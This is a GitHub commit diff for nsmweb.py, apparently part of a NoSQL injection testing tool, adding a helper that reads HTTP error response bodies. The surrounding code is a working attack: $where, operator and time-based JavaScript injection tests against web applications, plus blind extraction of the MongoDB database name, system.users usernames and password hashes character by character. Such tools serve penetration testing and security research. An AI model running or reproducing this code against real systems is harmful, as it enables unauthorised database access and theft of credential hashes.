Skip to content

Commit 9bcf017

Browse files
codingocodingo
authored
Merge pull request #61 from andresriancho/master
Better error handling for web applications which respond with non-200…
2 parents 0c642e3 + 5dc778a commit 9bcf017

File tree

1 file changed

+59
-53
lines changed

1 file changed

+59
-53
lines changed

nsmweb.py

Lines changed: 59 additions & 53 deletions
Original file line numberDiff line numberDiff line change
@@ -58,7 +58,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
5858
req = urllib2.Request(appURL, None, requestHeaders)
5959
appRespCode = urllib2.urlopen(req).getcode()
6060
if appRespCode == 200:
61-
normLength = int(len(urllib2.urlopen(req).read()))
61+
normLength = int(len(getResponseBodyHandlingErrors(req)))
6262
timeReq = urllib2.urlopen(req)
6363
start = time.time()
6464
page = timeReq.read()
@@ -86,7 +86,6 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
8686
print "Using " + injectString + " for injection testing.\n"
8787

8888
# Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
89-
# Add error handling for Non-200 HTTP response codes if random strings freaks out the app.
9089
if "?" not in appURL:
9190
print "No URI parameters provided for GET request...Check your options.\n"
9291
raw_input("Press enter to continue...")
@@ -101,7 +100,9 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
101100
else:
102101
print "Sending random parameter value..."
103102

104-
randLength = int(len(urllib2.urlopen(req).read()))
103+
responseBody = getResponseBodyHandlingErrors(req)
104+
randLength = int(len(responseBody))
105+
105106
print "Got response length of " + str(randLength) + "."
106107
randNormDelta = abs(normLength - randLength)
107108

@@ -117,10 +118,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
117118

118119
# Test for errors returned by injection
119120
req = urllib2.Request(uriArray[1], None, requestHeaders)
120-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
121+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
121122

122123
if errorCheck == False:
123-
injLen = int(len(urllib2.urlopen(req).read()))
124+
injLen = int(len(getResponseBodyHandlingErrors(req)))
124125
checkResult(randLength,injLen,testNum,verb,None)
125126
testNum += 1
126127
else:
@@ -135,11 +136,11 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
135136

136137
print uriArray[2]
137138
req = urllib2.Request(uriArray[2], None, requestHeaders)
138-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
139+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
139140

140141

141142
if errorCheck == False:
142-
injLen = int(len(urllib2.urlopen(req).read()))
143+
injLen = int(len(getResponseBodyHandlingErrors(req)))
143144
checkResult(randLength,injLen,testNum,verb,None)
144145
testNum += 1
145146

@@ -154,11 +155,11 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
154155
print "Test 3: $where injection (integer escape)"
155156

156157
req = urllib2.Request(uriArray[3], None, requestHeaders)
157-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
158+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
158159

159160

160161
if errorCheck == False:
161-
injLen = int(len(urllib2.urlopen(req).read()))
162+
injLen = int(len(getResponseBodyHandlingErrors(req)))
162163
checkResult(randLength,injLen,testNum,verb,None)
163164
testNum +=1
164165

@@ -174,10 +175,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
174175
print "Test 4: $where injection string escape (single record)"
175176

176177
req = urllib2.Request(uriArray[4], None, requestHeaders)
177-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
178+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
178179

179180
if errorCheck == False:
180-
injLen = int(len(urllib2.urlopen(req).read()))
181+
injLen = int(len(getResponseBodyHandlingErrors(req)))
181182
checkResult(randLength,injLen,testNum,verb,None)
182183
testNum += 1
183184
else:
@@ -191,10 +192,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
191192
print "Test 5: $where injection integer escape (single record)"
192193

193194
req = urllib2.Request(uriArray[5], None, requestHeaders)
194-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
195+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
195196

196197
if errorCheck == False:
197-
injLen = int(len(urllib2.urlopen(req).read()))
198+
injLen = int(len(getResponseBodyHandlingErrors(req)))
198199
checkResult(randLength,injLen,testNum,verb,None)
199200
testNum +=1
200201

@@ -209,10 +210,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
209210
print "Test 6: This != injection (string escape)"
210211

211212
req = urllib2.Request(uriArray[6], None, requestHeaders)
212-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
213+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
213214

214215
if errorCheck == False:
215-
injLen = int(len(urllib2.urlopen(req).read()))
216+
injLen = int(len(getResponseBodyHandlingErrors(req)))
216217
checkResult(randLength,injLen,testNum,verb,None)
217218
testNum += 1
218219
else:
@@ -226,10 +227,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
226227
print "Test 7: This != injection (integer escape)"
227228

228229
req = urllib2.Request(uriArray[7], None, requestHeaders)
229-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
230+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
230231

231232
if errorCheck == False:
232-
injLen = int(len(urllib2.urlopen(req).read()))
233+
injLen = int(len(getResponseBodyHandlingErrors(req)))
233234
checkResult(randLength,injLen,testNum,verb,None)
234235
testNum += 1
235236
else:
@@ -244,10 +245,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
244245
print "Test 8: PHP/ExpressJS > Undefined Injection"
245246

246247
req = urllib2.Request(uriArray[8], None, requestHeaders)
247-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
248+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
248249

249250
if errorCheck == False:
250-
injLen = int(len(urllib2.urlopen(req).read()))
251+
injLen = int(len(getResponseBodyHandlingErrors(req)))
251252
checkResult(randLength,injLen,testNum,verb,None)
252253
testNum += 1
253254

@@ -258,10 +259,8 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
258259
print "Starting Javascript string escape time based injection..."
259260
req = urllib2.Request(uriArray[18], None, requestHeaders)
260261
start = time.time()
261-
strTimeInj = urllib2.urlopen(req)
262-
page = strTimeInj.read()
262+
page = getResponseBodyHandlingErrors(req)
263263
end = time.time()
264-
strTimeInj.close()
265264
#print str(end)
266265
#print str(start)
267266
strTimeDelta = (int(round((end - start), 3)) - timeBase)
@@ -277,10 +276,8 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
277276
print "Starting Javascript integer escape time based injection..."
278277
req = urllib2.Request(uriArray[9], None, requestHeaders)
279278
start = time.time()
280-
intTimeInj = urllib2.urlopen(req)
281-
page = intTimeInj.read()
279+
page = getResponseBodyHandlingErrors(req)
282280
end = time.time()
283-
intTimeInj.close()
284281
#print str(end)
285282
#print str(start)
286283
intTimeDelta = (int(round((end - start), 3)) - timeBase)
@@ -348,6 +345,15 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
348345
return()
349346

350347

348+
def getResponseBodyHandlingErrors(req):
349+
try:
350+
responseBody = urllib2.urlopen(req).read()
351+
except urllib2.HTTPError, err:
352+
responseBody = err.read()
353+
354+
return responseBody
355+
356+
351357
def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
352358
print "Web App Attacks (POST)"
353359
print "==============="
@@ -386,7 +392,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
386392

387393
if appRespCode == 200:
388394

389-
normLength = int(len(urllib2.urlopen(req).read()))
395+
normLength = int(len(getResponseBodyHandlingErrors(req)))
390396
timeReq = urllib2.urlopen(req)
391397
start = time.time()
392398
page = timeReq.read()
@@ -438,7 +444,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
438444

439445
body = urllib.urlencode(postData)
440446
req = urllib2.Request(appURL,body, requestHeaders)
441-
randLength = int(len(urllib2.urlopen(req).read()))
447+
randLength = int(len(getResponseBodyHandlingErrors(req)))
442448
print "Got response length of " + str(randLength) + "."
443449

444450
randNormDelta = abs(normLength - randLength)
@@ -460,10 +466,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
460466
else:
461467
print "Test 1: PHP/ExpressJS != associative array injection"
462468

463-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
469+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
464470

465471
if errorCheck == False:
466-
injLen = int(len(urllib2.urlopen(req).read()))
472+
injLen = int(len(getResponseBodyHandlingErrors(req)))
467473
checkResult(randLength,injLen,testNum,verb,postData)
468474
testNum += 1
469475

@@ -487,10 +493,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
487493
else:
488494
print "Test 2: PHP/ExpressJS > Undefined Injection"
489495

490-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
496+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
491497

492498
if errorCheck == False:
493-
injLen = int(len(urllib2.urlopen(req).read()))
499+
injLen = int(len(getResponseBodyHandlingErrors(req)))
494500
checkResult(randLength,injLen,testNum,verb,postData)
495501
testNum += 1
496502

@@ -504,10 +510,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
504510
else:
505511
print "Test 3: $where injection (string escape)"
506512

507-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
513+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
508514

509515
if errorCheck == False:
510-
injLen = int(len(urllib2.urlopen(req).read()))
516+
injLen = int(len(getResponseBodyHandlingErrors(req)))
511517
checkResult(randLength,injLen,testNum,verb,postData)
512518
testNum += 1
513519
else:
@@ -524,10 +530,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
524530
else:
525531
print "Test 4: $where injection (integer escape)"
526532

527-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
533+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
528534

529535
if errorCheck == False:
530-
injLen = int(len(urllib2.urlopen(req).read()))
536+
injLen = int(len(getResponseBodyHandlingErrors(req)))
531537
checkResult(randLength,injLen,testNum,verb,postData)
532538
testNum += 1
533539
else:
@@ -545,10 +551,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
545551
else:
546552
print "Test 5: $where injection string escape (single record)"
547553

548-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
554+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
549555

550556
if errorCheck == False:
551-
injLen = int(len(urllib2.urlopen(req).read()))
557+
injLen = int(len(getResponseBodyHandlingErrors(req)))
552558
checkResult(randLength,injLen,testNum,verb,postData)
553559
testNum += 1
554560

@@ -566,10 +572,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
566572
else:
567573
print "Test 6: $where injection integer escape (single record)"
568574

569-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
575+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
570576

571577
if errorCheck == False:
572-
injLen = int(len(urllib2.urlopen(req).read()))
578+
injLen = int(len(getResponseBodyHandlingErrors(req)))
573579
checkResult(randLength,injLen,testNum,verb,postData)
574580
testNum += 1
575581

@@ -588,10 +594,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
588594
else:
589595
print "Test 7: This != injection (string escape)"
590596

591-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
597+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
592598

593599
if errorCheck == False:
594-
injLen = int(len(urllib2.urlopen(req).read()))
600+
injLen = int(len(getResponseBodyHandlingErrors(req)))
595601
checkResult(randLength,injLen,testNum,verb,postData)
596602
testNum += 1
597603
print "\n"
@@ -608,10 +614,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
608614
else:
609615
print "Test 8: This != injection (integer escape)"
610616

611-
errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
617+
errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)
612618

613619
if errorCheck == False:
614-
injLen = int(len(urllib2.urlopen(req).read()))
620+
injLen = int(len(getResponseBodyHandlingErrors(req)))
615621
checkResult(randLength,injLen,testNum,verb,postData)
616622
testNum += 1
617623

@@ -974,7 +980,7 @@ def getDBInfo():
974980
trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&")
975981
#print "Debug " + str(trueUri)
976982
req = urllib2.Request(trueUri, None, requestHeaders)
977-
baseLen = int(len(urllib2.urlopen(req).read()))
983+
baseLen = int(len(getResponseBodyHandlingErrors(req)))
978984
print "Got baseline true query length of " + str(baseLen)
979985

980986
print "Calculating DB name length..."
@@ -983,7 +989,7 @@ def getDBInfo():
983989
calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")
984990
#print "Debug: " + calcUri
985991
req = urllib2.Request(calcUri, None, requestHeaders)
986-
lenUri = int(len(urllib2.urlopen(req).read()))
992+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
987993
#print "Debug length: " + str(lenUri)
988994

989995
if lenUri == baseLen:
@@ -998,7 +1004,7 @@ def getDBInfo():
9981004
charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&")
9991005

10001006
req = urllib2.Request(charUri, None, requestHeaders)
1001-
lenUri = int(len(urllib2.urlopen(req).read()))
1007+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
10021008

10031009
if lenUri == baseLen:
10041010
dbName = dbName + chars[charCounter]
@@ -1024,7 +1030,7 @@ def getDBInfo():
10241030
usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")
10251031

10261032
req = urllib2.Request(usrCntUri, None, requestHeaders)
1027-
lenUri = int(len(urllib2.urlopen(req).read()))
1033+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
10281034

10291035
if lenUri == baseLen:
10301036
print "Found " + str(usrCount) + " user(s)."
@@ -1050,7 +1056,7 @@ def getDBInfo():
10501056
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
10511057

10521058
req = urllib2.Request(usrUri, None, requestHeaders)
1053-
lenUri = int(len(urllib2.urlopen(req).read()))
1059+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
10541060

10551061
if lenUri == baseLen:
10561062
# Got the right number of characters
@@ -1063,7 +1069,7 @@ def getDBInfo():
10631069
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
10641070

10651071
req = urllib2.Request(usrUri, None, requestHeaders)
1066-
lenUri = int(len(urllib2.urlopen(req).read()))
1072+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
10671073

10681074
if lenUri == baseLen:
10691075
username = username + chars[charCounterUsr]
@@ -1088,7 +1094,7 @@ def getDBInfo():
10881094
hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&")
10891095

10901096
req = urllib2.Request(hashUri, None, requestHeaders)
1091-
lenUri = int(len(urllib2.urlopen(req).read()))
1097+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
10921098

10931099
if lenUri == baseLen:
10941100
pwdHash = pwdHash + chars[charCounterHash]
@@ -1111,7 +1117,7 @@ def getDBInfo():
11111117
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
11121118

11131119
req = urllib2.Request(usrUri, None, requestHeaders)
1114-
lenUri = int(len(urllib2.urlopen(req).read()))
1120+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
11151121

11161122
if lenUri == baseLen:
11171123
# Got the right number of characters
@@ -1124,7 +1130,7 @@ def getDBInfo():
11241130
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
11251131

11261132
req = urllib2.Request(usrUri, None, requestHeaders)
1127-
lenUri = int(len(urllib2.urlopen(req).read()))
1133+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
11281134

11291135
if lenUri == baseLen:
11301136
username = username + chars[charCounterUsr]
@@ -1146,7 +1152,7 @@ def getDBInfo():
11461152
hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&")
11471153

11481154
req = urllib2.Request(hashUri, None, requestHeaders)
1149-
lenUri = int(len(urllib2.urlopen(req).read()))
1155+
lenUri = int(len(getResponseBodyHandlingErrors(req)))
11501156

11511157
if lenUri == baseLen:
11521158
pwdHash = pwdHash + chars[charCounterHash]

0 commit comments

Comments
 (0)